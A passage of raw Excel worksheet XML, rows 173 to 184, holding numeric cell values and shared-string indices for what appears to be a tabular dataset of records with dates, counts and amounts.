      <c r="AV173">
        <v>1</v>
      </c>
      <c r="AW173">
        <v>55</v>
      </c>
      <c r="AX173">
        <v>91</v>
      </c>
      <c r="AY173">
        <v>37</v>
      </c>
      <c r="AZ173">
        <v>17</v>
      </c>
      <c r="BA173" t="s">
        <v>16702</v>
      </c>
      <c r="BB173" t="s">
        <v>14606</v>
      </c>
      <c r="BC173" t="s">
        <v>11138</v>
      </c>
      <c r="BD173" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="174" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A174">
        <v>352</v>
      </c>
      <c r="B174" t="s">
        <v>1527</v>
      </c>
      <c r="C174" t="s">
        <v>168</v>
      </c>
      <c r="D174" t="s">
        <v>1528</v>
      </c>
      <c r="E174" t="s">
        <v>1529</v>
      </c>
      <c r="F174" t="s">
        <v>1530</v>
      </c>
      <c r="G174" s="1">
        <v>44067</v>
      </c>
      <c r="H174">
        <v>4179</v>
      </c>
      <c r="I174">
        <v>4179</v>
      </c>
      <c r="J174">
        <v>0</v>
      </c>
      <c r="K174">
        <v>4</v>
      </c>
      <c r="L174">
        <v>0</v>
      </c>
      <c r="M174">
        <v>0</v>
      </c>
      <c r="N174">
        <v>0</v>
      </c>
      <c r="O174">
        <v>0</v>
      </c>
      <c r="P174">
        <v>0</v>
      </c>
      <c r="Q174">
        <v>0</v>
      </c>
      <c r="R174">
        <v>3</v>
      </c>
      <c r="S174">
        <v>0</v>
      </c>
      <c r="T174">
        <v>2</v>
      </c>
      <c r="U174">
        <v>0</v>
      </c>
      <c r="V174">
        <v>4</v>
      </c>
      <c r="W174">
        <v>0</v>
      </c>
      <c r="X174">
        <v>0</v>
      </c>
      <c r="Y174">
        <v>0</v>
      </c>
      <c r="Z174">
        <v>0</v>
      </c>
      <c r="AA174">
        <v>0</v>
      </c>
      <c r="AB174">
        <v>0</v>
      </c>
      <c r="AC174">
        <v>0</v>
      </c>
      <c r="AD174">
        <v>0</v>
      </c>
      <c r="AE174">
        <v>0</v>
      </c>
      <c r="AF174" t="s">
        <v>1531</v>
      </c>
      <c r="AG174">
        <v>17530</v>
      </c>
      <c r="AH174">
        <v>13</v>
      </c>
      <c r="AJ174">
        <v>176</v>
      </c>
      <c r="AK174" t="s">
        <v>1532</v>
      </c>
      <c r="AL174" t="s">
        <v>1533</v>
      </c>
      <c r="AM174" t="s">
        <v>1534</v>
      </c>
      <c r="AN174" t="s">
        <v>288</v>
      </c>
      <c r="AO174">
        <v>2016</v>
      </c>
      <c r="AP174">
        <v>2122157908</v>
      </c>
      <c r="AQ174" t="s">
        <v>1535</v>
      </c>
      <c r="AR174" t="s">
        <v>1536</v>
      </c>
      <c r="AS174" t="s">
        <v>71</v>
      </c>
      <c r="AT174" t="s">
        <v>58</v>
      </c>
      <c r="AU174">
        <v>0</v>
      </c>
      <c r="AV174">
        <v>0</v>
      </c>
      <c r="AW174">
        <v>0</v>
      </c>
      <c r="AX174">
        <v>0</v>
      </c>
      <c r="AY174">
        <v>12</v>
      </c>
      <c r="AZ174">
        <v>4</v>
      </c>
      <c r="BA174" t="s">
        <v>17390</v>
      </c>
      <c r="BB174" t="s">
        <v>14503</v>
      </c>
      <c r="BC174">
        <v>0</v>
      </c>
      <c r="BD174" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="175" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A175">
        <v>690</v>
      </c>
      <c r="B175" t="s">
        <v>1537</v>
      </c>
      <c r="C175" t="s">
        <v>1310</v>
      </c>
      <c r="D175" t="s">
        <v>1538</v>
      </c>
      <c r="E175" t="s">
        <v>843</v>
      </c>
      <c r="F175" t="s">
        <v>1539</v>
      </c>
      <c r="G175" s="1">
        <v>44022</v>
      </c>
      <c r="H175">
        <v>4224</v>
      </c>
      <c r="I175">
        <v>4224</v>
      </c>
      <c r="J175">
        <v>0</v>
      </c>
      <c r="K175">
        <v>0</v>
      </c>
      <c r="L175">
        <v>0</v>
      </c>
      <c r="M175">
        <v>0</v>
      </c>
      <c r="N175">
        <v>0</v>
      </c>
      <c r="O175">
        <v>0</v>
      </c>
      <c r="P175">
        <v>0</v>
      </c>
      <c r="Q175">
        <v>0</v>
      </c>
      <c r="R175">
        <v>0</v>
      </c>
      <c r="S175">
        <v>1</v>
      </c>
      <c r="T175">
        <v>1</v>
      </c>
      <c r="U175">
        <v>0</v>
      </c>
      <c r="V175">
        <v>0</v>
      </c>
      <c r="W175">
        <v>0</v>
      </c>
      <c r="X175">
        <v>0</v>
      </c>
      <c r="Y175">
        <v>0</v>
      </c>
      <c r="Z175">
        <v>0</v>
      </c>
      <c r="AA175">
        <v>0</v>
      </c>
      <c r="AB175">
        <v>0</v>
      </c>
      <c r="AC175">
        <v>0</v>
      </c>
      <c r="AD175">
        <v>1</v>
      </c>
      <c r="AE175">
        <v>2</v>
      </c>
      <c r="AF175" t="s">
        <v>1540</v>
      </c>
      <c r="AG175">
        <v>78391</v>
      </c>
      <c r="AH175">
        <v>20</v>
      </c>
      <c r="AJ175">
        <v>326</v>
      </c>
      <c r="AK175" t="s">
        <v>1541</v>
      </c>
      <c r="AL175" t="s">
        <v>1541</v>
      </c>
      <c r="AM175" t="s">
        <v>1542</v>
      </c>
      <c r="AN175" t="s">
        <v>55</v>
      </c>
      <c r="AO175">
        <v>2008</v>
      </c>
      <c r="AP175">
        <v>81345748238</v>
      </c>
      <c r="AQ175" t="s">
        <v>1540</v>
      </c>
      <c r="AR175" t="s">
        <v>1540</v>
      </c>
      <c r="AS175" t="s">
        <v>71</v>
      </c>
      <c r="AT175" t="s">
        <v>58</v>
      </c>
      <c r="AU175">
        <v>24</v>
      </c>
      <c r="AV175">
        <v>1</v>
      </c>
      <c r="AW175">
        <v>7</v>
      </c>
      <c r="AX175">
        <v>0</v>
      </c>
      <c r="AY175">
        <v>0</v>
      </c>
      <c r="AZ175">
        <v>1</v>
      </c>
      <c r="BA175" t="s">
        <v>17342</v>
      </c>
      <c r="BB175" t="s">
        <v>14779</v>
      </c>
      <c r="BC175" t="s">
        <v>11152</v>
      </c>
      <c r="BD175" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="176" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A176">
        <v>80</v>
      </c>
      <c r="B176" t="s">
        <v>1543</v>
      </c>
      <c r="C176" t="s">
        <v>99</v>
      </c>
      <c r="D176" t="s">
        <v>1544</v>
      </c>
      <c r="E176" t="s">
        <v>1545</v>
      </c>
      <c r="F176" t="s">
        <v>1546</v>
      </c>
      <c r="G176" s="1">
        <v>44116</v>
      </c>
      <c r="H176">
        <v>4260</v>
      </c>
      <c r="I176">
        <v>4260</v>
      </c>
      <c r="J176">
        <v>3</v>
      </c>
      <c r="K176">
        <v>0</v>
      </c>
      <c r="L176">
        <v>2</v>
      </c>
      <c r="M176">
        <v>0</v>
      </c>
      <c r="N176">
        <v>0</v>
      </c>
      <c r="O176">
        <v>0</v>
      </c>
      <c r="P176">
        <v>0</v>
      </c>
      <c r="Q176">
        <v>10</v>
      </c>
      <c r="R176">
        <v>3</v>
      </c>
      <c r="S176">
        <v>0</v>
      </c>
      <c r="T176">
        <v>1</v>
      </c>
      <c r="U176">
        <v>900000</v>
      </c>
      <c r="V176">
        <v>0</v>
      </c>
      <c r="W176">
        <v>8000</v>
      </c>
      <c r="X176">
        <v>0</v>
      </c>
      <c r="Y176">
        <v>0</v>
      </c>
      <c r="Z176">
        <v>0</v>
      </c>
      <c r="AA176">
        <v>0</v>
      </c>
      <c r="AB176">
        <v>500</v>
      </c>
      <c r="AC176">
        <v>9000</v>
      </c>
      <c r="AD176">
        <v>0</v>
      </c>
      <c r="AE176">
        <v>5000</v>
      </c>
      <c r="AF176" t="s">
        <v>1547</v>
      </c>
      <c r="AG176">
        <v>14450</v>
      </c>
      <c r="AH176">
        <v>12</v>
      </c>
      <c r="AJ176">
        <v>160</v>
      </c>
      <c r="AK176" t="s">
        <v>114</v>
      </c>
      <c r="AL176" t="s">
        <v>115</v>
      </c>
      <c r="AM176" t="s">
        <v>1548</v>
      </c>
      <c r="AN176" t="s">
        <v>55</v>
      </c>
      <c r="AO176">
        <v>2014</v>
      </c>
      <c r="AP176" t="s">
        <v>1549</v>
      </c>
      <c r="AQ176" t="s">
        <v>1550</v>
      </c>
      <c r="AR176" t="s">
        <v>1551</v>
      </c>
      <c r="AS176" t="s">
        <v>71</v>
      </c>
      <c r="AT176" t="s">
        <v>58</v>
      </c>
      <c r="AU176">
        <v>25</v>
      </c>
      <c r="AV176">
        <v>0</v>
      </c>
      <c r="AW176">
        <v>40</v>
      </c>
      <c r="AX176">
        <v>5</v>
      </c>
      <c r="AY176">
        <v>28</v>
      </c>
      <c r="AZ176">
        <v>6</v>
      </c>
      <c r="BA176" t="s">
        <v>16600</v>
      </c>
      <c r="BB176" t="s">
        <v>14278</v>
      </c>
      <c r="BC176" t="s">
        <v>9550</v>
      </c>
      <c r="BD176" t="s">
        <v>11260</v>
      </c>
    </row>
    <row r="177" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A177">
        <v>826</v>
      </c>
      <c r="B177" t="s">
        <v>1552</v>
      </c>
      <c r="C177" t="s">
        <v>74</v>
      </c>
      <c r="D177" t="s">
        <v>1553</v>
      </c>
      <c r="E177" t="s">
        <v>142</v>
      </c>
      <c r="F177" t="s">
        <v>1554</v>
      </c>
      <c r="G177" s="1">
        <v>44098</v>
      </c>
      <c r="H177">
        <v>4307</v>
      </c>
      <c r="I177">
        <v>4307</v>
      </c>
      <c r="J177">
        <v>3</v>
      </c>
      <c r="K177">
        <v>0</v>
      </c>
      <c r="L177">
        <v>3</v>
      </c>
      <c r="M177">
        <v>3</v>
      </c>
      <c r="N177">
        <v>0</v>
      </c>
      <c r="O177">
        <v>0</v>
      </c>
      <c r="P177">
        <v>0</v>
      </c>
      <c r="Q177">
        <v>2</v>
      </c>
      <c r="R177">
        <v>0</v>
      </c>
      <c r="S177">
        <v>0</v>
      </c>
      <c r="T177">
        <v>2</v>
      </c>
      <c r="U177">
        <v>350000</v>
      </c>
      <c r="V177">
        <v>0</v>
      </c>
      <c r="W177">
        <v>11000</v>
      </c>
      <c r="X177">
        <v>3000</v>
      </c>
      <c r="Y177">
        <v>0</v>
      </c>
      <c r="Z177">
        <v>0</v>
      </c>
      <c r="AA177">
        <v>0</v>
      </c>
      <c r="AB177">
        <v>600</v>
      </c>
      <c r="AC177">
        <v>0</v>
      </c>
      <c r="AD177">
        <v>0</v>
      </c>
      <c r="AE177">
        <v>20000</v>
      </c>
      <c r="AF177" t="s">
        <v>1555</v>
      </c>
      <c r="AG177">
        <v>59252</v>
      </c>
      <c r="AH177">
        <v>14</v>
      </c>
      <c r="AJ177">
        <v>204</v>
      </c>
      <c r="AK177" t="s">
        <v>1556</v>
      </c>
      <c r="AL177" t="s">
        <v>1557</v>
      </c>
      <c r="AM177" t="s">
        <v>1558</v>
      </c>
      <c r="AN177" t="s">
        <v>55</v>
      </c>
      <c r="AO177">
        <v>2002</v>
      </c>
      <c r="AP177" t="s">
        <v>1559</v>
      </c>
      <c r="AQ177" t="s">
        <v>1560</v>
      </c>
      <c r="AR177" t="s">
        <v>1561</v>
      </c>
      <c r="AS177" t="s">
        <v>71</v>
      </c>
      <c r="AT177" t="s">
        <v>58</v>
      </c>
      <c r="AU177">
        <v>26</v>
      </c>
      <c r="AV177">
        <v>2</v>
      </c>
      <c r="AW177">
        <v>87</v>
      </c>
      <c r="AX177">
        <v>4</v>
      </c>
      <c r="AY177">
        <v>8</v>
      </c>
      <c r="AZ177">
        <v>8</v>
      </c>
      <c r="BA177" t="s">
        <v>17295</v>
      </c>
      <c r="BB177" t="s">
        <v>14876</v>
      </c>
      <c r="BC177" t="s">
        <v>9536</v>
      </c>
      <c r="BD177" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="178" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A178">
        <v>197</v>
      </c>
      <c r="B178" t="s">
        <v>1562</v>
      </c>
      <c r="C178" t="s">
        <v>189</v>
      </c>
      <c r="D178" t="s">
        <v>1563</v>
      </c>
      <c r="E178" t="s">
        <v>142</v>
      </c>
      <c r="F178" t="s">
        <v>1564</v>
      </c>
      <c r="G178" s="1">
        <v>44019</v>
      </c>
      <c r="H178">
        <v>4376</v>
      </c>
      <c r="I178">
        <v>4376</v>
      </c>
      <c r="J178">
        <v>1</v>
      </c>
      <c r="K178">
        <v>2</v>
      </c>
      <c r="L178">
        <v>3</v>
      </c>
      <c r="M178">
        <v>0</v>
      </c>
      <c r="N178">
        <v>0</v>
      </c>
      <c r="O178">
        <v>0</v>
      </c>
      <c r="P178">
        <v>0</v>
      </c>
      <c r="Q178">
        <v>2</v>
      </c>
      <c r="R178">
        <v>6</v>
      </c>
      <c r="S178">
        <v>1</v>
      </c>
      <c r="T178">
        <v>1</v>
      </c>
      <c r="U178">
        <v>400000</v>
      </c>
      <c r="V178">
        <v>2000</v>
      </c>
      <c r="W178">
        <v>8000</v>
      </c>
      <c r="X178">
        <v>0</v>
      </c>
      <c r="Y178">
        <v>0</v>
      </c>
      <c r="Z178">
        <v>0</v>
      </c>
      <c r="AA178">
        <v>0</v>
      </c>
      <c r="AB178">
        <v>500</v>
      </c>
      <c r="AC178">
        <v>6000</v>
      </c>
      <c r="AD178">
        <v>1000</v>
      </c>
      <c r="AE178">
        <v>20000</v>
      </c>
      <c r="AF178" t="s">
        <v>1565</v>
      </c>
      <c r="AG178">
        <v>97123</v>
      </c>
      <c r="AH178">
        <v>31</v>
      </c>
      <c r="AJ178">
        <v>461</v>
      </c>
      <c r="AK178" t="s">
        <v>1566</v>
      </c>
      <c r="AL178" t="s">
        <v>1567</v>
      </c>
      <c r="AM178" t="s">
        <v>1568</v>
      </c>
      <c r="AN178" t="s">
        <v>55</v>
      </c>
      <c r="AO178">
        <v>2009</v>
      </c>
      <c r="AP178" t="s">
        <v>1569</v>
      </c>
      <c r="AQ178" t="s">
        <v>1570</v>
      </c>
      <c r="AR178" t="s">
        <v>1565</v>
      </c>
      <c r="AS178" t="s">
        <v>71</v>
      </c>
      <c r="AT178" t="s">
        <v>58</v>
      </c>
      <c r="AU178">
        <v>26</v>
      </c>
      <c r="AV178">
        <v>0</v>
      </c>
      <c r="AW178">
        <v>6</v>
      </c>
      <c r="AX178">
        <v>2</v>
      </c>
      <c r="AY178">
        <v>11</v>
      </c>
      <c r="AZ178">
        <v>3</v>
      </c>
      <c r="BA178" t="s">
        <v>16637</v>
      </c>
      <c r="BB178">
        <v>0</v>
      </c>
      <c r="BC178" t="s">
        <v>10010</v>
      </c>
      <c r="BD178">
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A179">
        <v>681</v>
      </c>
      <c r="B179" t="s">
        <v>1571</v>
      </c>
      <c r="C179" t="s">
        <v>99</v>
      </c>
      <c r="D179" t="s">
        <v>1572</v>
      </c>
      <c r="E179" t="s">
        <v>142</v>
      </c>
      <c r="F179" t="s">
        <v>1573</v>
      </c>
      <c r="G179" s="1">
        <v>44274</v>
      </c>
      <c r="H179">
        <v>4391</v>
      </c>
      <c r="I179">
        <v>4391</v>
      </c>
      <c r="J179">
        <v>1</v>
      </c>
      <c r="K179">
        <v>0</v>
      </c>
      <c r="L179">
        <v>0</v>
      </c>
      <c r="M179">
        <v>0</v>
      </c>
      <c r="N179">
        <v>0</v>
      </c>
      <c r="O179">
        <v>0</v>
      </c>
      <c r="P179">
        <v>0</v>
      </c>
      <c r="Q179">
        <v>0</v>
      </c>
      <c r="R179">
        <v>0</v>
      </c>
      <c r="S179">
        <v>0</v>
      </c>
      <c r="T179">
        <v>0</v>
      </c>
      <c r="U179">
        <v>300000</v>
      </c>
      <c r="V179">
        <v>0</v>
      </c>
      <c r="W179">
        <v>0</v>
      </c>
      <c r="X179">
        <v>0</v>
      </c>
      <c r="Y179">
        <v>0</v>
      </c>
      <c r="Z179">
        <v>0</v>
      </c>
      <c r="AA179">
        <v>0</v>
      </c>
      <c r="AB179">
        <v>0</v>
      </c>
      <c r="AC179">
        <v>0</v>
      </c>
      <c r="AD179">
        <v>0</v>
      </c>
      <c r="AE179">
        <v>0</v>
      </c>
      <c r="AF179" t="s">
        <v>1574</v>
      </c>
      <c r="AG179">
        <v>14440</v>
      </c>
      <c r="AH179">
        <v>12</v>
      </c>
      <c r="AJ179">
        <v>160</v>
      </c>
      <c r="AK179" t="s">
        <v>114</v>
      </c>
      <c r="AL179" t="s">
        <v>114</v>
      </c>
      <c r="AM179" t="s">
        <v>1575</v>
      </c>
      <c r="AN179" t="s">
        <v>55</v>
      </c>
      <c r="AO179">
        <v>2018</v>
      </c>
      <c r="AP179" t="s">
        <v>1576</v>
      </c>
      <c r="AQ179" t="s">
        <v>1577</v>
      </c>
      <c r="AR179" t="s">
        <v>1574</v>
      </c>
      <c r="AS179" t="s">
        <v>179</v>
      </c>
      <c r="AT179" t="s">
        <v>58</v>
      </c>
      <c r="AU179">
        <v>22</v>
      </c>
      <c r="AV179">
        <v>2</v>
      </c>
      <c r="AW179">
        <v>0</v>
      </c>
      <c r="AX179">
        <v>0</v>
      </c>
      <c r="AY179">
        <v>4</v>
      </c>
      <c r="AZ179">
        <v>2</v>
      </c>
      <c r="BA179" t="s">
        <v>17201</v>
      </c>
      <c r="BB179" t="s">
        <v>14772</v>
      </c>
      <c r="BC179" t="s">
        <v>11221</v>
      </c>
      <c r="BD179">
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A180">
        <v>708</v>
      </c>
      <c r="B180" t="s">
        <v>1578</v>
      </c>
      <c r="C180" t="s">
        <v>47</v>
      </c>
      <c r="D180" t="s">
        <v>1579</v>
      </c>
      <c r="E180" t="s">
        <v>363</v>
      </c>
      <c r="F180" t="s">
        <v>1580</v>
      </c>
      <c r="G180" s="1">
        <v>44144</v>
      </c>
      <c r="H180">
        <v>4439</v>
      </c>
      <c r="I180">
        <v>4439</v>
      </c>
      <c r="J180">
        <v>0</v>
      </c>
      <c r="K180">
        <v>0</v>
      </c>
      <c r="L180">
        <v>0</v>
      </c>
      <c r="M180">
        <v>0</v>
      </c>
      <c r="N180">
        <v>0</v>
      </c>
      <c r="O180">
        <v>0</v>
      </c>
      <c r="P180">
        <v>0</v>
      </c>
      <c r="Q180">
        <v>0</v>
      </c>
      <c r="R180">
        <v>0</v>
      </c>
      <c r="S180">
        <v>0</v>
      </c>
      <c r="T180">
        <v>3</v>
      </c>
      <c r="U180">
        <v>0</v>
      </c>
      <c r="V180">
        <v>0</v>
      </c>
      <c r="W180">
        <v>0</v>
      </c>
      <c r="X180">
        <v>0</v>
      </c>
      <c r="Y180">
        <v>0</v>
      </c>
      <c r="Z180">
        <v>0</v>
      </c>
      <c r="AA180">
        <v>0</v>
      </c>
      <c r="AB180">
        <v>0</v>
      </c>
      <c r="AC180">
        <v>0</v>
      </c>
      <c r="AD180">
        <v>0</v>
      </c>
      <c r="AE180">
        <v>12000</v>
      </c>
      <c r="AF180" t="s">
        <v>1581</v>
      </c>
      <c r="AG180">
        <v>0</v>
      </c>
      <c r="AH180">
        <v>2</v>
      </c>
      <c r="AJ180">
        <v>53</v>
      </c>
      <c r="AK180" t="s">
        <v>1582</v>
      </c>
      <c r="AL180" t="s">
        <v>1583</v>
      </c>
      <c r="AM180" t="s">
        <v>1584</v>
      </c>
      <c r="AN180" t="s">
        <v>55</v>
      </c>
      <c r="AO180">
        <v>2005</v>
      </c>
      <c r="AP180">
        <v>616851751</v>
      </c>
      <c r="AQ180">
        <v>8116076918</v>
      </c>
      <c r="AR180" t="s">
        <v>1585</v>
      </c>
      <c r="AS180" t="s">
        <v>71</v>
      </c>
      <c r="AT180" t="s">
        <v>58</v>
      </c>
      <c r="AU180">
        <v>0</v>
      </c>
      <c r="AV180">
        <v>0</v>
      </c>
      <c r="AW180">
        <v>0</v>
      </c>
      <c r="AX180">
        <v>0</v>
      </c>
      <c r="AY180">
        <v>4</v>
      </c>
      <c r="AZ180">
        <v>6</v>
      </c>
      <c r="BA180" t="s">
        <v>16741</v>
      </c>
      <c r="BB180" t="s">
        <v>14791</v>
      </c>
      <c r="BC180" t="s">
        <v>9536</v>
      </c>
      <c r="BD180" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="181" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A181">
        <v>142</v>
      </c>
      <c r="B181" t="s">
        <v>1586</v>
      </c>
      <c r="C181" t="s">
        <v>129</v>
      </c>
      <c r="D181" t="s">
        <v>1587</v>
      </c>
      <c r="E181" t="s">
        <v>131</v>
      </c>
      <c r="F181" t="s">
        <v>1588</v>
      </c>
      <c r="G181" s="1">
        <v>44140</v>
      </c>
      <c r="H181">
        <v>4472</v>
      </c>
      <c r="I181">
        <v>4472</v>
      </c>
      <c r="J181">
        <v>0</v>
      </c>
      <c r="K181">
        <v>0</v>
      </c>
      <c r="L181">
        <v>0</v>
      </c>
      <c r="M181">
        <v>0</v>
      </c>
      <c r="N181">
        <v>0</v>
      </c>
      <c r="O181">
        <v>0</v>
      </c>
      <c r="P181">
        <v>0</v>
      </c>
      <c r="Q181">
        <v>2</v>
      </c>
      <c r="R181">
        <v>0</v>
      </c>
      <c r="S181">
        <v>0</v>
      </c>
      <c r="T181">
        <v>1</v>
      </c>
      <c r="U181">
        <v>0</v>
      </c>
      <c r="V181">
        <v>0</v>
      </c>
      <c r="W181">
        <v>0</v>
      </c>
      <c r="X181">
        <v>0</v>
      </c>
      <c r="Y181">
        <v>0</v>
      </c>
      <c r="Z181">
        <v>0</v>
      </c>
      <c r="AA181">
        <v>0</v>
      </c>
      <c r="AB181">
        <v>5000</v>
      </c>
      <c r="AC181">
        <v>0</v>
      </c>
      <c r="AD181">
        <v>0</v>
      </c>
      <c r="AE181">
        <v>100000</v>
      </c>
      <c r="AF181" t="s">
        <v>1589</v>
      </c>
      <c r="AG181">
        <v>42152</v>
      </c>
      <c r="AH181">
        <v>11</v>
      </c>
      <c r="AJ181">
        <v>269</v>
      </c>
      <c r="AK181" t="s">
        <v>1590</v>
      </c>
      <c r="AL181" t="s">
        <v>1591</v>
      </c>
      <c r="AM181" t="s">
        <v>1592</v>
      </c>
      <c r="AN181" t="s">
        <v>55</v>
      </c>
      <c r="AO181">
        <v>1997</v>
      </c>
      <c r="AP181">
        <v>2545751207</v>
      </c>
      <c r="AQ181" t="s">
        <v>1593</v>
      </c>
      <c r="AR181" t="s">
        <v>1594</v>
      </c>
      <c r="AS181" t="s">
        <v>71</v>
      </c>
      <c r="AT181" t="s">
        <v>58</v>
      </c>
      <c r="AU181">
        <v>22</v>
      </c>
      <c r="AV181">
        <v>3</v>
      </c>
      <c r="AW181">
        <v>2</v>
      </c>
      <c r="AX181">
        <v>0</v>
      </c>
      <c r="AY181">
        <v>15</v>
      </c>
      <c r="AZ181">
        <v>1</v>
      </c>
      <c r="BA181" t="s">
        <v>16998</v>
      </c>
      <c r="BB181" t="s">
        <v>14334</v>
      </c>
      <c r="BC181" t="s">
        <v>11262</v>
      </c>
      <c r="BD181" t="s">
        <v>11263</v>
      </c>
    </row>
    <row r="182" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A182">
        <v>444</v>
      </c>
      <c r="B182" t="s">
        <v>1595</v>
      </c>
      <c r="C182" t="s">
        <v>157</v>
      </c>
      <c r="D182" t="s">
        <v>1596</v>
      </c>
      <c r="E182" t="s">
        <v>1597</v>
      </c>
      <c r="F182" t="s">
        <v>1598</v>
      </c>
      <c r="G182" s="1">
        <v>44155</v>
      </c>
      <c r="H182">
        <v>4509</v>
      </c>
      <c r="I182">
        <v>4509</v>
      </c>
      <c r="J182">
        <v>2</v>
      </c>
      <c r="K182">
        <v>1</v>
      </c>
      <c r="L182">
        <v>2</v>
      </c>
      <c r="M182">
        <v>0</v>
      </c>
      <c r="N182">
        <v>0</v>
      </c>
      <c r="O182">
        <v>0</v>
      </c>
      <c r="P182">
        <v>0</v>
      </c>
      <c r="Q182">
        <v>20</v>
      </c>
      <c r="R182">
        <v>2</v>
      </c>
      <c r="S182">
        <v>0</v>
      </c>
      <c r="T182">
        <v>0</v>
      </c>
      <c r="U182">
        <v>350000</v>
      </c>
      <c r="V182">
        <v>10000</v>
      </c>
      <c r="W182">
        <v>10000</v>
      </c>
      <c r="X182">
        <v>0</v>
      </c>
      <c r="Y182">
        <v>0</v>
      </c>
      <c r="Z182">
        <v>0</v>
      </c>
      <c r="AA182">
        <v>0</v>
      </c>
      <c r="AB182">
        <v>4000</v>
      </c>
      <c r="AC182">
        <v>4000</v>
      </c>
      <c r="AD182">
        <v>0</v>
      </c>
      <c r="AE182">
        <v>0</v>
      </c>
      <c r="AF182" t="s">
        <v>1599</v>
      </c>
      <c r="AG182">
        <v>67153</v>
      </c>
      <c r="AH182">
        <v>16</v>
      </c>
      <c r="AJ182">
        <v>241</v>
      </c>
      <c r="AK182" t="s">
        <v>1117</v>
      </c>
      <c r="AL182" t="s">
        <v>1600</v>
      </c>
      <c r="AM182" t="s">
        <v>1601</v>
      </c>
      <c r="AN182" t="s">
        <v>55</v>
      </c>
      <c r="AO182">
        <v>2016</v>
      </c>
      <c r="AP182" t="s">
        <v>1602</v>
      </c>
      <c r="AQ182" t="s">
        <v>1603</v>
      </c>
      <c r="AR182" t="s">
        <v>1599</v>
      </c>
      <c r="AU182">
        <v>26</v>
      </c>
      <c r="AV182">
        <v>1</v>
      </c>
      <c r="AW182">
        <v>8</v>
      </c>
      <c r="AX182">
        <v>19</v>
      </c>
      <c r="AY182">
        <v>7</v>
      </c>
      <c r="AZ182">
        <v>11</v>
      </c>
      <c r="BA182" t="s">
        <v>16691</v>
      </c>
      <c r="BB182" t="s">
        <v>14579</v>
      </c>
      <c r="BC182" t="s">
        <v>11276</v>
      </c>
      <c r="BD182" t="s">
        <v>11084</v>
      </c>
    </row>
    <row r="183" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A183">
        <v>241</v>
      </c>
      <c r="B183" t="s">
        <v>1604</v>
      </c>
      <c r="C183" t="s">
        <v>157</v>
      </c>
      <c r="D183" t="s">
        <v>1605</v>
      </c>
      <c r="E183" t="s">
        <v>111</v>
      </c>
      <c r="F183" t="s">
        <v>1606</v>
      </c>
      <c r="G183" s="1">
        <v>44061</v>
      </c>
      <c r="H183">
        <v>4529</v>
      </c>
      <c r="I183">
        <v>4529</v>
      </c>
      <c r="J183">
        <v>3</v>
      </c>
      <c r="K183">
        <v>0</v>
      </c>
      <c r="L183">
        <v>2</v>
      </c>
      <c r="M183">
        <v>0</v>
      </c>
      <c r="N183">
        <v>0</v>
      </c>
      <c r="O183">
        <v>0</v>
      </c>
      <c r="P183">
        <v>0</v>
      </c>
      <c r="Q183">
        <v>20</v>
      </c>
      <c r="R183">
        <v>28</v>
      </c>
      <c r="S183">
        <v>0</v>
      </c>
      <c r="T183">
        <v>0</v>
      </c>
      <c r="U183">
        <v>1500000</v>
      </c>
      <c r="V183">
        <v>0</v>
      </c>
      <c r="W183">
        <v>12000</v>
      </c>
      <c r="X183">
        <v>0</v>
      </c>
      <c r="Y183">
        <v>0</v>
      </c>
      <c r="Z183">
        <v>0</v>
      </c>
      <c r="AA183">
        <v>0</v>
      </c>
      <c r="AB183">
        <v>4000</v>
      </c>
      <c r="AC183">
        <v>5600</v>
      </c>
      <c r="AD183">
        <v>0</v>
      </c>
      <c r="AE183">
        <v>0</v>
      </c>
      <c r="AF183" t="s">
        <v>1607</v>
      </c>
      <c r="AG183">
        <v>60292</v>
      </c>
      <c r="AH183">
        <v>16</v>
      </c>
      <c r="AJ183">
        <v>264</v>
      </c>
      <c r="AK183" t="s">
        <v>1608</v>
      </c>
      <c r="AL183" t="s">
        <v>1608</v>
      </c>
      <c r="AM183" t="s">
        <v>1609</v>
      </c>
      <c r="AN183" t="s">
        <v>55</v>
      </c>
      <c r="AO183">
        <v>2001</v>
      </c>
      <c r="AP183">
        <v>318495811</v>
      </c>
      <c r="AQ183" t="s">
        <v>1610</v>
      </c>
      <c r="AR183" t="s">
        <v>1611</v>
      </c>
      <c r="AS183" t="s">
        <v>71</v>
      </c>
      <c r="AT183" t="s">
        <v>58</v>
      </c>
      <c r="AU183">
        <v>26</v>
      </c>
      <c r="AV183">
        <v>1</v>
      </c>
      <c r="AW183">
        <v>50</v>
      </c>
      <c r="AX183">
        <v>75</v>
      </c>
      <c r="AY183">
        <v>16</v>
      </c>
      <c r="AZ183">
        <v>24</v>
      </c>
      <c r="BA183" t="s">
        <v>17443</v>
      </c>
      <c r="BB183" t="s">
        <v>14415</v>
      </c>
      <c r="BC183" t="s">
        <v>11289</v>
      </c>
      <c r="BD183" t="s">
        <v>11290</v>
      </c>
    </row>
    <row r="184" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A184">
        <v>49</v>
      </c>
      <c r="B184" t="s">
        <v>1612</v>
      </c>
      <c r="C184" t="s">
        <v>99</v>
      </c>
      <c r="D184" t="s">
        <v>1613</v>
      </c>
      <c r="E184" t="s">
        <v>363</v>
      </c>
      <c r="F184" t="s">
        <v>1614</v>
      </c>
      <c r="G184" s="1">
        <v>44067</v>
      </c>
      <c r="H184">
        <v>4573</v>
      </c>
      <c r="I184">
        <v>4573</v>
      </c>
      <c r="J184">
        <v>0</v>
      </c>
      <c r="K184">
        <v>0</v>
      </c>
      <c r="L184">
        <v>0</v>
      </c>
      <c r="M184">
        <v>0</v>
      </c>
      <c r="N184">
        <v>0</v>
      </c>
      <c r="O184">
        <v>0</v>
      </c>
      <c r="P184">
        <v>0</v>
      </c>
      <c r="Q184">
        <v>0</v>
      </c>
      <c r="R184">
        <v>0</v>
      </c>
